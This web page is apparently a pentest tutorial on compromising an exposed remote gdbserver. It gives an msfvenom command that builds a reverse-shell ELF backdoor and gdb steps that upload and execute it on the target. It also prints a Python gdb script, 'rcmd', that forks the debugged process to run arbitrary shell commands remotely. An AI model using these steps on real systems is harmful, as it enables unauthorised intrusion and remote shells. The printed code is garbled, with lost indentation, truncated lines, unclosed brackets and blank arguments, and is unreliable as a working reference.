Pentest GDBServer

Pentesting Remote GdbServer


Pentesting Remote GdbServer: Gdbserver is a handy tool that lets you debug programs remotely. It runs right alongside the program you want to debug on the same machine, called the “target.”

This setup allows the GNU Debugger to connect from another machine, the “host,” where you have the source code and a copy of the program. You can connect gdbserver to the debugger over TCP or a serial line, which gives you a lot of flexibility in your debugging setups.

You can set gdbserver to listen on any port, and at the moment, nmap can’t recognize the service.


Upload and Execute

You can easily create an ELF backdoor using msfvenom. Just generate the backdoor, upload it to your target system, and then execute it.

# Trick shared by @B1n4rySh4d0w
msfvenom -p linux/x64/shell_reverse_tcp LHOST= LPORT=4444 PrependFork=true -f elf -o binary.elf

chmod +x binary.elf

gdb binary.elf

# Set remote debuger target
target extended-remote

# Upload elf file
remote put binary.elf binary.elf

# Set remote executable file
set remote exec-file /home/user/binary.elf

# Execute reverse shell executable

# You should get your reverse-shell

Execute arbitrary commands

Pentesting Remote GdbServer, You can also make the debugger run arbitrary commands by using a custom Python script from this source.

# Given remote terminal running `gdbserver :2345 ./remote_executable`, we connect to that server.
target extended-remote

# Load our custom gdb command `rcmd`.
source ./

# Change to a trusty binary and run it to load it
set remote exec-file /bin/bash

# Run until a point where libc has been loaded on the remote process, e.g. start of main().
tb main

# Run the remote command, e.g. `ls`.
rcmd ls

First, create this script on your local machine:

#!/usr/bin/env python3

import gdb
import re
import traceback
import uuid

class RemoteCmd(gdb.Command):
def __init__(self):
self.addresses = {}

self.tmp_file = f'/tmp/{uuid.uuid4().hex}'
gdb.write(f"Using tmp output file: {self.tmp_file}.\n")

gdb.execute("set detach-on-fork off")
gdb.execute("set follow-fork-mode parent")

gdb.execute("set max-value-size unlimited")
gdb.execute("set pagination off")
gdb.execute("set print elements 0")
gdb.execute("set print repeats 0")

super(RemoteCmd, self).__init__("rcmd", gdb.COMMAND_USER)

def preload(self):
for symbol in [

def load(self, symbol):
if symbol not in self.addresses:
address_string = gdb.execute(f"info address {symbol}", to_string=True)
match = re.match(
f'Symbol "{symbol}" is at ([0-9a-fx]+) .*', address_string, re.IGNORECASE
if match and len(match.groups()) > 0:
self.addresses[symbol] = match.groups()[0]
raise RuntimeError(f'Could not retrieve address for symbol "{symbol}".')

return self.addresses[symbol]

def output(self):
# From `fcntl-linux.h`
f'set $fd = (int){self.load("open")}("{self.tmp_file}", {O_RDONLY})'

# From `stdio.h`
gdb.execute(f'set $len = (int){self.load("lseek")}($fd, 0, {SEEK_END})')
gdb.execute(f'call (int){self.load("lseek")}($fd, 0, {SEEK_SET})')
if int(gdb.convenience_variable("len")) <= 0:
gdb.write("No output was captured.")

gdb.execute(f'set $mem = (void*){self.load("malloc")}($len)')
gdb.execute(f'call (int){self.load("read")}($fd, $mem, $len)')
gdb.execute('printf "%s\\n", (char*) $mem')

gdb.execute(f'call (int){self.load("close")}($fd)')
gdb.execute(f'call (int){self.load("free")}($mem)')

def invoke(self, arg, from_tty):

is_auto_solib_add = gdb.parameter("auto-solib-add")
gdb.execute("set auto-solib-add off")

parent_inferior = gdb.selected_inferior()
gdb.execute(f'set $child_pid = (int){self.load("fork")}()')
child_pid = gdb.convenience_variable("child_pid")
child_inferior = list(
filter(lambda x: == child_pid, gdb.inferiors())
gdb.execute(f"inferior {child_inferior.num}")

f'call (int){self.load("execl")}("/bin/sh", "sh", "-c", "exec {arg} >{self.tmp_file} 2>&1", (char*)0)'
except gdb.error as e:
if (
"The program being debugged exited while in a function called from GDB"
in str(e)
raise e
gdb.execute(f"inferior {parent_inferior.num}")
gdb.execute(f"remove-inferiors {child_inferior.num}")

except Exception as e:
raise e
gdb.execute(f'set auto-solib-add {"on" if is_auto_solib_add else "off"}')



By following these steps, you can effectively leverage gdbserver for remote debugging, create and execute an ELF backdoor with msfvenom, and run arbitrary commands using a custom Python script. These techniques provide powerful tools for advanced debugging and testing, enhancing your ability to manage and troubleshoot software remotely. Pentesting Remote GdbServer

Also Read: Pentest VOIP

Ads Blocker Image Powered by Code Help Pro

Ads Blocker Detected!!!

We have detected that you are using extensions or brave browser to block ads. Please support us by disabling these ads blocker.Our website is made possible by displaying Ads hope you whitelist our site. We use very minimal Ads in our site


Scroll to Top